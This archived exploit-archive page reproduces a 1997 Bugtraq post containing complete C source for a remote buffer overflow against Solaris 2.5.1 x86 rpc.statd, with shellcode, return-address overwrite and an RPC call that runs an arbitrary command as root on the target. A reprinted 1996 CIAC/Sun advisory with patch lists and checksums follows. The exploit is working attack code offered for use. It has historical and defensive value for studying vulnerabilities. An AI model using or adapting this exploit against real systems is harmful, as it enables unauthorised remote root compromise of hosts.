Solaris Statd exploit

Summary
Description:Solaris 2.5.1 x86 remote overflow for statd. There is apparently an earlier patch which doesn't fix the problem.
Author:Anonymous
Compromise: root (remote)
Vulnerable Systems:Solaris 2.5.1 x86 is what this exploit is written for. According to a later CERT advisory, vulnerable systems include Digital UNIX (4.0 through 4.0c), AIX 3.2 and 4.1, Solaris 2.5, 2.51 and SunOS 4.1.* for both X86 and SPARC
Date:24 November 1997
Details


Date: Mon, 24 Nov 1997 15:27:06 -0600
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Solaris 2.5.1 x86 statd exploit

>From an anonymous source:
--

/*
 statd remote overflow, solaris 2.5.1 x86
 there is a patch for statd in solaris 2.5, well, it looks like
 they check only for '/' characters and they left overflow there ..
 nah, it's solaris

 usage: ./r host [cmd]  # default cmd is "touch /tmp/blahblah"
                        # remember that statd is standalone daemon

 Please do not distribute.
 */

#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/sm_inter.h>
#include <sys/socket.h>

#define BUFSIZE 1024
#define ADDRS 2+1+1+4
#define ADDRP 0x8045570;

/* up to ~ 150 characters, there must be three strings */
char *cmd[3]={"/bin/sh", "-c", "touch /tmp/blahblah"};

char asmcode[]="\xeb\x3c\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\xf7\x83\xc7\x10\x89\x3e\x4f\x47\xfe\x07\x75\xfb\x47\x89\x7e\x04\x4f\x47\xfe\x07\x75\xfb\x47\x89\x7e\x08\x4f\x47\xfe\x07\x75\xfb\x89\x46\x0c\x50\x56\xff\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x0


1\x07\x07\xe8\xbf\xff\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02";
char nop[]="\x90";

char code[4096];

void usage(char *s) {
  printf("Usage: %s host [cmd]\n", s);
  exit(0);
}

main(int argc, char *argv[]) {
  CLIENT *cl;
  enum clnt_stat stat;
  struct timeval tm;
  struct mon monreq;
  struct sm_stat_res monres;
  struct hostent *hp;
  struct sockaddr_in target;
  int sd, i, noplen=strlen(nop);
  char *ptr=code;

  if (argc < 2)
    usage(argv[0]);
  if (argc == 3)
    cmd[2]=argv[2];

  for (i=0; i< sizeof(code); i++)
    *ptr++=nop[i % noplen];

  strcpy(&code[750], asmcode);  /* XXX temp. */
  ptr=code+strlen(code);
  for (i=0; i<=strlen(cmd[0]); i++)
    *ptr++=cmd[0][i]-1;
  for (i=0; i<=strlen(cmd[1]); i++)
    *ptr++=cmd[1][i]-1;
  for (i=0; i<=strlen(cmd[2]); i++)
    *ptr++=cmd[2][i]-1;
  ptr=code+BUFSIZE-(ADDRS<<2);
  for (i=0; i<ADDRS; i++, ptr+=4)
    *(int *)ptr=ADDRP;
  *ptr=0;

  printf("strlen = %d\n", strlen(code));

  memset(&monreq, 0, sizeof(monreq));
  monreq.mon_id.my_id.my_name="localhost";
  monreq.mon_id.my_id.my_prog=0;
  monreq.mon_id.my_id.my_vers=0;
  monreq.mon_id.my_id.my_proc=0;
  monreq.mon_id.mon_name=code;

  if ((hp=gethostbyname(argv[1])) == NULL) {
    printf("Can't resolve %s\n", argv[1]);
    exit(0);
  }
  target.sin_family=AF_INET;
  target.sin_addr.s_addr=*(u_long *)hp->h_addr;
  target.sin_port=0;    /* ask portmap */
  sd=RPC_ANYSOCK;

  tm.tv_sec=10;
  tm.tv_usec=0;
  if ((cl=clntudp_create(&target, SM_PROG, SM_VERS, tm, &sd)) == NULL) {
    clnt_pcreateerror("clnt_create");
    exit(0);
  }
  stat=clnt_call(cl, SM_MON, xdr_mon, (char *)&monreq, xdr_sm_stat_res,
                (char *)&monres, tm);
  if (stat != RPC_SUCCESS)
    clnt_perror(cl, "clnt_call");
  else
    printf("stat_res = %d.\n", monres.res_stat);
  clnt_destroy(cl);
}













----------------------------------------------------------------------------------

             __________________________________________________________

                       The U.S. Department of Energy
                    Computer Incident Advisory Capability
                           ___  __ __    _     ___
                          /       |     /_\   /
                          \___  __|__  /   \  \___
             __________________________________________________________

                             INFORMATION BULLETIN

                        SUN statd Program Vulnerability

May 21, 1996 21:00 GMT                                             Number G-25
______________________________________________________________________________
PROBLEM:       rpc.statd fails to completely validate the information it
               receives from rpc.lockd.
PLATFORM:      Solaris 2.x (SunOS 5.x) and Solaris 1.x (SunOS 4.1.x).
DAMAGE:        A user can potentially remove and create files with root
               privileges.
SOLUTION:      Install the proper patches described below.
______________________________________________________________________________
VULNERABILITY  No exploitations of this vulnerability has been reported. But,
ASSESSMENT:    if it is exploited, a user can potentially remove or create any
               file that the root user can create.
______________________________________________________________________________

CIAC has obtained information from Sun Microsystems pertaining to the statd
program vulnerability. This vulnerability has been previously addressed in
the CIAC G-22: rpc.statd Vulnerability Bulletin, issued on 22 Apr 96. CIAC
recommends that you install the proper patches described below.

[ Start of SUN Bulletin ]

 ============================================================================
         SUN MICROSYSTEMS SECURITY BULLETIN: #00135, 21 May 1996
 ============================================================================

BULLETIN TOPICS

In this bulletin Sun announces the release of security-related patches
for both Solaris 2.x (SunOS 5.x) and Solaris 1.x (SunOS 4.1.x). The
patches relate to a single vulnerability involving the statd program.

This vulnerability, which affects the products of several UNIX vendors,
has previously been discussed in CERT (sm) Advisory CA-96.09, issued on
24 Apr 96. As of this writing, Sun is aware of no successful attacks
based on this problem.

I.   Who is Affected, and What to Do

II.  Understanding the Vulnerability

III. List of Patches

IV.  Checksum Table

APPENDICES

A.   How to obtain Sun security patches

B.   How to report or inquire about Sun security problems

C.   How to obtain Sun security bulletins or short status updates

         Send Replies or Inquiries To:

         Mark Graff
         Sun Security Coordinator
         MS MPK17-103
         2550 Garcia Avenue Mountain
         View, CA 94043-1100

         Phone: 415-786-5274
         Fax:   415-786-7994
         E-mail: security-alert@Sun.COM

Sun acknowledges with thanks both the CERT Coordination Center (Carnegie
Mellon University) and Wolfgang Ley (of DFN/CERT) for their assistance
in the preparation of this bulletin.

Sun, CERT, and DFN/CERT are all members of FIRST, the Forum of Incident
Response and Security Teams. For more information about FIRST, visit
the FIRST web site at "http://www.first.org/". For information about
the upcoming 8th FIRST Conference and Workshop (Santa Clara, CA, July
28-31, 1996) see "http://ciac.llnl.gov/firstconf".

Keywords:       statd, root, file_creation, file_deletion
Patchlist:      100988-05, 101592-07, 102516-04, 102769-03,
                102770-03, 102932-02, 103468-01, 103469-01
Cross-Ref:      CERT CA-96.09

                                -----------

Permission is granted for the redistribution of this Bulletin for
the purpose of alerting Sun customers to problems, as long as the
Bulletin is not edited and is attributed to Sun Microsystems.

Any other use of this information without the express written consent
of Sun Microsystems is prohibited. Sun Microsystems expressly disclaims
all liability for any misuse of this information by any third party.

 ============================================================================
         SUN MICROSYSTEMS SECURITY BULLETIN: #00135, 21 May 1996
 ============================================================================

I.   Who is Affected, and What to Do

Sun has verified that this vulnerability affects all supported Solaris
2.x (SunOS 5.x) and Solaris 1.x (SunOS 4.1.x) systems.

Installing and running the software provided in these patches
completely closes the vulnerability.

For information about how to obtain these and other Sun patches, see
Appendix A.

II.  Understanding the Vulnerability

If exploited, this vulnerability can be used to remove any file that
the root user can remove or to create any file that the root user can
create. The security of a system could be completely compromised in
this way.

The following information, excerpted from the cited CERT(sm) advisory,
provides some details. (Note: statd is called "rpc.statd" on many
other UNIX systems.)

     When an NFS server reboots, rpc.statd causes the previously held
     locks to be recovered by notifying the NFS client lock daemons to
     resubmit previously granted lock requests. If a lock daemon fails
     to secure a previously granted lock on the NFS server, it sends
     SIGLOST to the process that originally requested the file lock.

     The vulnerability in rpc.statd is its lack of validation of the
     information it receives from what is presumed to be the remote
     rpc.lockd.  Because rpc.statd normally runs as root and because it
     does not validate this information, rpc.statd can be made to
     remove or create any file that the root user can remove or create
     on the NFS server.

III. List of Patches

The patches required to close this vulnerability are listed below.

    A. Solaris 2.x (SunOS 5.x) patches

    Patches which replace the affected statd executable are available
    for every supported version of SunOS 5.x.

        OS version      Patch ID
        ----------      ---------
        SunOS 5.3       102932-02
        SunOS 5.4       102769-03
        SunOS 5.4_X86   102770-03
        SunOS 5.5       103468-01
        SunOS 5.5_X86   103469-01

    B.  Solaris 1.x (SunOS 4.1.x) patches

    For SunOS 4.1.x, the fix is supplied in a new version of the "UFS
    file system and NFS locking" jumbo patch.

        OS version      Patch ID
        ----------      ---------
        4.1.3           100988-05
        SunOS 4.1.3_U1  101592-07
        SunOS 4.1.4     102516-04

IV.  Checksum Table

In the checksum table we show the BSD and SVR4 checksums and MD5 digital
signatures for the compressed tar archives.

    File             BSD          SVR4        MD5
    Name             Checksum     Checksum    Digital Signature
    ---------------  -----------  ---------   --------------------------------
    100988-05.tar.Z  10148 444    4116 888    ACE925E808A582D6CF9209FE7A51D23B
    101592-07.tar.Z  21219 346    32757 692   7B7EE4BD5B2692249FDB9178746AA71B
    102516-04.tar.Z  65418 201    61604 401   DB87F3DDA2F12FE2CFBB8B56874A1756
    102769-03.tar.Z  38936 74     64202 148   9A8E4D9BE8C58FD532EE0E2140EF7F85
    102770-03.tar.Z  04518 71     23051 141   F646E2B7AD66EEFBB32F6AB630796AF8
    102932-02.tar.Z  34664 70     45816 139   66CB7F6AE48784A884BA658186268C41
    103468-01.tar.Z  30917 82     46790 164   84680D9A0D2AEF62FFE1382C82684BE5
    103469-01.tar.Z  31245 82     52288 164   F22AEB0FD91687DAB8ADC4DF10348DE8

The checksums shown above are from the BSD-based checksum (on 4.1.x,
/bin/sum; on SunOS 5.x, /usr/ucb/sum) and from the SVR4 version on
on SunOS 5.x (/usr/bin/sum).

APPENDICES

A.   How to obtain Sun security patches

    1. If you have a support contract

    Customers with Sun support contracts can obtain any patches listed
    in this bulletin (and any other patches--and a list of patches) from:

       - SunSolve Online
       - Local Sun answer centers, worldwide
       - SunSITEs worldwide

    The patches are available via World Wide Web at http://sunsolve1.sun.com.

    You should also contact your answer center if you have a support
    contract and:

       - You need assistance in installing a patch
       - You need additional patches
       - You want an existing patch ported to another platform
       - You believe you have encountered a bug in a Sun patch
       - You want to know if a patch exists, or when one will be ready

    2. If you do not have a support contract

    Customers without support contracts may now obtain security patches,
    "recommended" patches, and patch lists via SunSolve Online.

    Sun does not furnish patches to any external distribution sites
    other than the ones mentioned here. The ftp.uu.net and ftp.eu.net
    sites are no longer supported.

    3. About the checksums

    So that you can quickly verify the integrity of the patch files
    themselves, we supply in each bulletin checksums for the tar archives.

    Occasionally, you may find that the listed checksums do not match
    the patches on the SunSolve or SunSite database. This does not
    necessarily mean that the patch has been tampered with. More likely,
    a non-substantive change (such as a revision to the README file)
    has altered the checksum of the tar file. The SunSolve patch database
    is refreshed nightly, and will sometimes contain versions of a patch
    newer than the one on which the checksums were based.

    In the future we may provide checksum information for the
    individual components of a patch as well as the compressed archive
    file. This would allow customers to determine, if need be, which
    file(s) have been changed since we issued the bulletin containing
    the checksums.

    In the meantime, if you would like assistance in verifying the
    integrity of a patch file please contact this office or your local
    answer center.

B.   How to report or inquire about Sun security problems

If you discover a security problem with Sun software or wish to
inquire about a possible problem, contact one or more of the
following:

   - Your local Sun answer centers
   - Your representative computer security response team, such as CERT
   - This office. Address postal mail to:

         Sun Security Coordinator
         MS MPK17-103
         2550 Garcia Avenue Mountain
         View, CA 94043-1100

         Phone: 415-786-5274
         Fax:   415-786-7994
         E-mail: security-alert@Sun.COM

We strongly recommend that you report problems to your local Answer
Center. In some cases they will accept a report of a security bug
even if you do not have a support contract. An additional notification
to the security-alert alias is suggested but should not be used as your
primary vehicle for reporting a bug.

C.   How to obtain Sun security bulletins or short status updates

    1.. Subscription information

    Sun Security Bulletins are available free of charge as part of
    our Customer Warning System. It is not necessary to have a Sun
    support contract in order to receive them.

    To receive information or to subscribe or unsubscribe from our
    mailing list, send mail to security-alert@sun.com with a subject
    line containing one of the following commands.

        Subject         Information Returned/Action Taken
        -------         ---------------------------------

        HELP            An explanation of how to get information

        LIST            A list of current security topics

        QUERY [topic]   The mail containing the question is relayed to
                        a Security Coordinator for a response.

        REPORT [topic]  The mail containing the text is treated as a
                        security bug report and forwarded to a Security
                        Coordinator for handling. Please note that this
                        channel of communications does not supersede
                        the use of Sun Solution Centers for this
                        purpose.  Note also that we do not recommend
                        that detailed problem descriptions be sent in
                        plain text.

        SEND topic      Summary of the status of selected topic. (To
                        retrieve a Sun Security Bulletin, supply the
                        number of the bulletin, as in "SEND #103".)

        SUBSCRIBE       Sender is added to the CWS (Customer
                        Warning System) list.  The subscribe feature
                        requires that the sender include on the subject
                        line the word "cws" and the reply email
                        address.  So the subject line might look like
                        the following:

                                SUBSCRIBE cws graff@sun.com

        UNSUBSCRIBE     Sender is removed from the CWS list.

    Should your email not fit into one of the above subjects, a help
    message will be returned to you.

    Due to the volume of subscription requests we receive, we cannot
    guarantee to acknowledge requests. Please contact this office if
    you wish to verify that your subscription request was received, or
    if you would like your bulletin delivered via postal mail or fax.

    2. Obtaining old bulletins

    Sun Security Bulletins are available via the security-alert alias
    and on SunSolve. Please try these sources first before contacting
    this office for old bulletins.

                                ------------

[ End of SUN Bulletin ]

_______________________________________________________________________________

CIAC wishes to acknowledge the contributions of Sun Microsystems for the
information contained in this bulletin.
_______________________________________________________________________________

CIAC, the Computer Incident Advisory Capability, is the computer
security incident response team for the U.S. Department of Energy
(DOE) and the emergency backup response team for the National
Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
National Laboratory in Livermore, California. CIAC is also a founding
member of FIRST, the Forum of Incident Response and Security Teams, a
global organization established to foster cooperation and coordination
among computer security teams worldwide.

CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
can be contacted at:
    Voice:    +1 510-422-8193
    FAX:      +1 510-423-8002
    STU-III:  +1 510-423-2604
    E-mail:   ciac@llnl.gov

For emergencies and off-hour assistance, DOE, DOE contractor sites,
and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
8AM PST), call the CIAC voice number 510-422-8193 and leave a message,
or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
duty person, and the secondary PIN number, 8550074 is for the CIAC
Project Leader.

Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.

   World Wide Web:      http://ciac.llnl.gov/
   Anonymous FTP:       ciac.llnl.gov (128.115.19.53)
   Modem access:        +1 (510) 423-4753 (28.8K baud)
                        +1 (510) 423-3331 (28.8K baud)

CIAC has several self-subscribing mailing lists for electronic
publications:
1. CIAC-BULLETIN for Advisories, highest priority - time critical
   information and Bulletins, important computer security information;
2. CIAC-NOTES for Notes, a collection of computer security articles;
3. SPI-ANNOUNCE for official news about Security Profile Inspector
   (SPI) software updates, new features, distribution and
   availability;
4. SPI-NOTES, for discussion of problems and solutions regarding the
   use of SPI products.

Our mailing lists are managed by a public domain software package
called ListProcessor, which ignores E-mail header subject lines. To
subscribe (add yourself) to one of our mailing lists, send the
following request as the E-mail message body, substituting
CIAC-BULLETIN, CIAC-NOTES, SPI-ANNOUNCE or SPI-NOTES for list-name and
valid information for LastName FirstName and PhoneNumber when sending

E-mail to       ciac-listproc@llnl.gov:
        subscribe list-name LastName, FirstName PhoneNumber
  e.g., subscribe ciac-notes OHara, Scarlett W. 404-555-1212 x36

You will receive an acknowledgment containing address, initial PIN,
and information on how to change either of them, cancel your
subscription, or get help.

PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins.  If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide
organization. A list of FIRST member organizations and their
constituencies can be obtained by sending email to
docserver@first.org with an empty subject line and a message body
containing the line: send first-contacts.

This document was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the University of California nor any of their
employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process
disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products,
process, or service by trade name, trademark, manufacturer, or
otherwise, does not necessarily constitute or imply its endorsement,
recommendation or favoring by the United States Government or the
University of California. The views and opinions of authors expressed
herein do not necessarily state or reflect those of the United States
Government or the University of California, and shall not be used for
advertising or product endorsement purposes.

LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)

G-15: Sunsoft Demo CD Vulnerability
G-16: SGI rpc.statd Program Security Vulnerabilities
G-17: Vulnerabilities in Sample HTTPD CGIs
G-18: Digital OSF/1 dxconsole Security Vulnerability
G-19: IBM AIX rmail Vulnerability
G-20: Vulnerability in NCSA and Apache httpd Servers
G-21: Vulnerabilities in PCNFSD Program
G-22: rpc.statd Vulnerability
G-23: Solaris NIS+ Configuration Vulnerability
G-24: FreeBSD Security Vulnerabilities

RECENT CIAC NOTES ISSUED (Previous Notes available from CIAC)

Notes 07 - 3/29/95     A comprehensive review of SATAN

Notes 08 - 4/4/95      A Courtney update

Notes 09 - 4/24/95     More on the "Good Times" virus urban legend

Notes 10 - 6/16/95     PKZ300B Trojan, Logdaemon/FreeBSD, vulnerability
                       in S/Key, EBOLA Virus Hoax, and Caibua Virus

Notes 11 - 7/31/95     Virus Update, Hats Off to Administrators,
                       America On-Line Virus Scare, SPI 3.2.2 Released,
                       The Die_Hard Virus

Notes 12 - 9/12/95     Securely configuring Public Telnet Services, X
                       Windows, beta release of Merlin, Microsoft Word
                       Macro Viruses, Allegations of Inappropriate Data
                       Collection in Win95

Notes 96-01 - 3/18/96  Java and JavaScript Vulnerabilities, FIRST
                       Conference Announcement, Security and Web Search
                       Engines, Microsoft Word Macro Virus Update

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMaTMFbnzJzdsy3QZAQFcbgQAj93OrHN+nVUbVfRjP/NeBfTJd++HEtWa
jFrMwrtfFydBQr1+QtvxcBb44g/zycoQYf3U5F3ixeCb6VSM0Zs3nX2qTxYCmX53
lDL4lpzctDJN2VSWQ359p3zHrRVPPaLugqR7vwgMpMXHTrD/pOebTsNAxW7X95EZ
kRgjVvi3YXc=
=uyKB
-----END PGP SIGNATURE-----

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: